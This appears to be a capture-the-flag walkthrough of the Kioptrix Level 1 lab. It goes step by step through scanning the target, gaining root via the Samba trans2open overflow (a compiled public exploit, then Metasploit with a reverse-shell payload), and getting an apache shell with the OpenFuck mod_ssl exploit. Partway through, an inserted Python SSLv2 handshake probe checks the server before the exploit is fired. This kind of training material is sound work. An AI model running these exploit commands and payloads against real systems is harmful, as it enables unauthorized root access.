kioptrix level 1
The article describes scanning the local network to identify potential targets and using Nmap for service and version detection. The Samba version is then enumerated with Metasploit and CVE-2003-0201 is exploited to obtain root privileges. In addition, the Apache mod_ssl vulnerability CVE-2002-0082 is used to obtain a remote shell as the apache user. 2025-9-12 22:44:6 Author: infosecwriteups.com


Mostafa Ahmed

Information Gathering

To begin the assessment, I started with host discovery on the local subnet. An ARP sweep only sees hosts in the same broadcast domain, but it does not depend on the targets answering ICMP or TCP probes, so it is the quickest way to enumerate active devices on a lab network:

arp-scan -l

From the results, I discovered the target machine with the IP address 192.168.133.141


Once the target was identified, I proceeded with a service and version detection scan using Nmap:

└─$ nmap -sV -O 192.168.133.141

The scan revealed six open ports, among them SSH, HTTP, HTTPS, RPC, and the NetBIOS session service (139/tcp) that Samba listens on. Nmap's OS fingerprint put the kernel at Linux 2.4.x, an end-of-life release, so old and likely unpatched services were to be expected.


Samba Enumeration with Metasploit

After identifying that port 139/tcp (NetBIOS-SSN) was open, I decided to enumerate the Samba service to determine its exact version. This would help me confirm whether the service was vulnerable to known exploits.

Since Nmap did not reveal the version, I used Metasploit’s SMB scanner module:

Start Metasploit

└─$ msfconsole

Search for Samba-related modules

└─$ search samba

The search did not turn up an auxiliary scanner, but a quick Google search showed that it is listed under a different name:

└─$ use auxiliary/scanner/smb/smb_version

Running show options showed that the module only needs the target IP address.

Set the target IP address

└─$ set RHOST 192.168.133.141

Run the module

└─$ run

Result:
Metasploit identified the target as running Samba 2.2.1a on Unix.


After discovering that the target is running Samba 2.2.1a, I used Searchsploit (the Exploit-DB command-line tool) to look for publicly available exploits related to this version.

└─$ searchsploit samba 2.2.1a

Searchsploit returned multiple results, including the well-known trans2open buffer overflow exploit:


Exploitation — Samba Remote Code Execution

The results showed a remote code execution exploit (trans2open overflow, CVE-2003-0201). I took the first entry listed for Samba 2.2.1a, Exploit-DB 10.c.

Copy the Exploit Locally

└─$ searchsploit -m multiple/remote/10.c -o Desktop/10.c

Compile it; this produces an executable named exploit:

└─$ gcc Desktop/10.c -o exploit

After compiling the Samba exploit (10.c), I ran it against the target IP address. -b 0 puts the exploit in brute-force mode with the Linux target, so it steps through candidate return addresses until the overflow lands:

└─$ ./exploit -b 0 192.168.133.141

Post-Exploitation: Gaining Root Access

Using the compiled Samba trans2open exploit, I successfully executed remote code and gained root access to the target machine.


Metasploit Exploitation of Samba 2.2.1a (CVE-2003–0201)

Using Metasploit, I exploited the vulnerable Samba service on port 139/tcp via the trans2open buffer overflow.

Configuration Summary

└─$ use exploit/linux/samba/trans2open
└─$ set PAYLOAD linux/x86/shell_reverse_tcp
└─$ set RHOSTS 192.168.133.141
└─$ set RPORT 139
└─$ run

A plain reverse shell is chosen instead of the module's default staged Meterpreter payload, which does not run reliably on a 2.4 kernel this old; LHOST is left at the value Metasploit fills in from the attacking interface.


Execution Output

Four command shell sessions opened. The module brute-forces the return address, and each attempt that lands spawns its own shell, which is why one run yields several sessions:

  • Session 1: 192.168.133.141:1025
  • Session 2: 192.168.133.141:1026
  • Session 3: 192.168.133.141:1027
  • Session 4: 192.168.133.141:1028

Privilege Verification

Inside the shell, I ran:

id

Output:

uid=0(root) gid=0(root) groups=99(nobody)

Confirmed root-level access.

Password Change (Post-Exploitation Step)

With root, I changed the root password:

passwd root
New password: 123
Retype new password: 123

This is acceptable only in a lab: on a real engagement you do not alter credentials on a client system, and a three-character password would itself be a finding.

Apache Enumeration & Remote Exploitation

Target Information

  • IP Address: 192.168.133.141
  • Service Detected: Apache HTTP Server running on port 80
  • SSL Service: OpenSSL via Apache mod_ssl module on port 443

Initial Enumeration

From the earlier port scan, port 80 (HTTP) was open, indicating a running web server. To discover hidden directories and files, I used the following tools:

└─$ dirb http://192.168.133.141/
└─$ nikto -h http://192.168.133.141/

Result:
No interesting files, directories, or vulnerabilities were discovered through web enumeration.

SSL Vulnerability Discovery

Next, I investigated potential vulnerabilities in the Apache version and SSL module using Searchsploit:

searchsploit apache mod_ssl


Exploit Apache mod_ssl:

This revealed several known exploits for Apache mod_ssl, specifically for versions prior to 2.8.7 in combination with vulnerable versions of OpenSSL.

I selected the following exploit:

  • Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
  • CVE: CVE-2002–0082

One caveat on the identifier: CVE-2002-0082 is the mod_ssl session-cache bug that Exploit-DB attaches to this entry, but the overflow OpenFuck actually triggers is the KEY_ARG overflow in OpenSSL's SSLv2 handshake (CVE-2002-0656), so the real precondition is an SSLv2-capable OpenSSL older than 0.9.6e behind mod_ssl, not the mod_ssl version string alone.

Exploit Download & Compilation

I copied the exploit from Exploit-DB using:

└─$ searchsploit -m unix/remote/47080.c -o 47080.c

Compiled the exploit:

gcc 47080.c -o OpenFuck -lssl -lcrypto

Exploitation

Executed the compiled exploit against the target:

└─$ ./OpenFuck 0x6b 192.168.133.141 443 -c 10
  • 0x6b is the target code. Running ./OpenFuck with no arguments prints the table of supported distribution / Apache build combinations, and the entry must match the Apache version the server reports (Nmap's -sV output or the Server header); a wrong code just crashes the child process.
  • -c sets the number of connections the exploit opens before sending the payload (10 here; higher values such as 50 are common when the first run fails).

Result:
Successfully gained a remote shell as the apache user:
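Because the overflow lives in the SSLv2 handshake, the useful pre-check before firing OpenFuck is whether the server still answers an SSLv2 CLIENT-HELLO at all; current openssl s_client builds no longer speak SSLv2, so a hand-rolled probe is needed. The script below is an added example, not part of the write-up or of OpenFuck: it sends a minimal CLIENT-HELLO and decodes the SERVER-HELLO or ERROR that comes back, listing the SSLv2 cipher kinds the server offers. sample_server_hello() is a constructed message for offline use, and the function names are my own.

```python
"""SSLv2 handshake probe: send a CLIENT-HELLO and decode the SERVER-HELLO / ERROR.
Added example; not the article's code and not part of OpenFuck."""
import os
import socket
import struct

SSL2_MT_ERROR, SSL2_MT_CLIENT_HELLO, SSL2_MT_SERVER_HELLO = 0x00, 0x01, 0x04
SSL2_VERSION = 0x0002
SSL2_CIPHERS = {  # 3-byte SSLv2 cipher kinds -> OpenSSL names
    b"\x01\x00\x80": "RC4-MD5",
    b"\x02\x00\x80": "EXP-RC4-MD5",
    b"\x03\x00\x80": "RC2-CBC-MD5",
    b"\x04\x00\x80": "EXP-RC2-CBC-MD5",
    b"\x05\x00\x80": "IDEA-CBC-MD5",
    b"\x06\x00\x40": "DES-CBC-MD5",
    b"\x07\x00\xc0": "DES-CBC3-MD5",
}

def ssl2_record(body):
    """2-byte record header: high bit set = no padding, low 15 bits = body length."""
    return struct.pack(">H", 0x8000 | len(body)) + body

def ssl2_record_length(hdr):
    """Return (body length, header length) for either SSLv2 header form."""
    if hdr[0] & 0x80:
        return ((hdr[0] & 0x7F) << 8) | hdr[1], 2
    return ((hdr[0] & 0x3F) << 8) | hdr[1], 3  # 3-byte form: third byte is padding count

def client_hello(challenge=None):
    """CLIENT-HELLO offering every cipher kind above, no session id, 16-byte challenge."""
    challenge = challenge or os.urandom(16)
    specs = b"".join(SSL2_CIPHERS)
    body = struct.pack(">BHHHH", SSL2_MT_CLIENT_HELLO, SSL2_VERSION,
                       len(specs), 0, len(challenge)) + specs + challenge
    return ssl2_record(body)

def parse_server_hello(rec):
    """Decode the first record the server sends back; the dict's 'sslv2' key is the verdict."""
    length, hlen = ssl2_record_length(rec[:3])
    body = rec[hlen:hlen + length]
    if body[0] == SSL2_MT_ERROR:
        code, = struct.unpack_from(">H", body, 1)
        return {"sslv2": False, "reason": "SSLv2 ERROR code 0x%04x" % code}
    if body[0] != SSL2_MT_SERVER_HELLO:
        raise ValueError("unexpected SSLv2 message type 0x%02x" % body[0])
    hit, _cert_type, version, cert_len, spec_len, conn_len = struct.unpack_from(">BBHHHH", body, 1)
    off = 11                                   # fixed SERVER-HELLO fields end here
    cert = body[off:off + cert_len]
    specs = body[off + cert_len:off + cert_len + spec_len]
    ciphers = [SSL2_CIPHERS.get(specs[i:i + 3], specs[i:i + 3].hex())
               for i in range(0, len(specs), 3)]
    return {"sslv2": True, "version": version, "session_id_hit": bool(hit),
            "certificate_len": len(cert), "ciphers": ciphers, "connection_id_len": conn_len}

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def probe(host, port=443, timeout=5.0):
    """Connect, send the CLIENT-HELLO and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(client_hello())
        try:
            head = _recv_exact(s, 3)
        except (ConnectionError, socket.timeout):
            return {"sslv2": False, "reason": "no SSLv2 reply (connection closed or silent)"}
        if head[0] in (0x15, 0x16):            # TLS alert / handshake record instead
            return {"sslv2": False, "reason": "TLS record type 0x%02x in reply" % head[0]}
        length, hlen = ssl2_record_length(head)
        return parse_server_hello(head + _recv_exact(s, hlen + length - 3))

def sample_server_hello():
    """Constructed SERVER-HELLO (not a real capture): stub cert bytes, two cipher kinds."""
    cert = b"\x30\x82\x01\x00" + b"\x00" * 12   # placeholder bytes where DER would be
    specs = b"\x01\x00\x80" + b"\x07\x00\xc0"
    conn_id = b"\xaa" * 16
    body = struct.pack(">BBBHHHH", SSL2_MT_SERVER_HELLO, 0, 1, SSL2_VERSION,
                       len(cert), len(specs), len(conn_id)) + cert + specs + conn_id
    return ssl2_record(body)

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else parse_server_hello(sample_server_hello()))
```

A SERVER-HELLO with a non-empty cipher list confirms the SSLv2 precondition; a TLS alert record or a closed connection means the handshake OpenFuck relies on is not available, whatever the Apache banner says.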


Conclusion

This assessment demonstrates successful exploitation of the Kioptrix Level 1 machine through two critical vulnerabilities:

Vulnerabilities Exploited:

1- Samba 2.2.1a (CVE-2003–0201)

  • Type: Remote Code Execution via trans2open buffer overflow
  • Access Gained: root shell (UID 0)
  • Tools Used: Metasploit + Manual Exploit (10.c)

2- Apache mod_ssl < 2.8.7 + OpenSSL (CVE-2002–0082)

  • Type: Remote Buffer Overflow
  • Access Gained: Limited shell as apache
  • Exploit Used: OpenFuckV2.c

Source: https://infosecwriteups.com/kioptrix-level-1-24841c948a30?source=rss----7b722bfd1b8d---4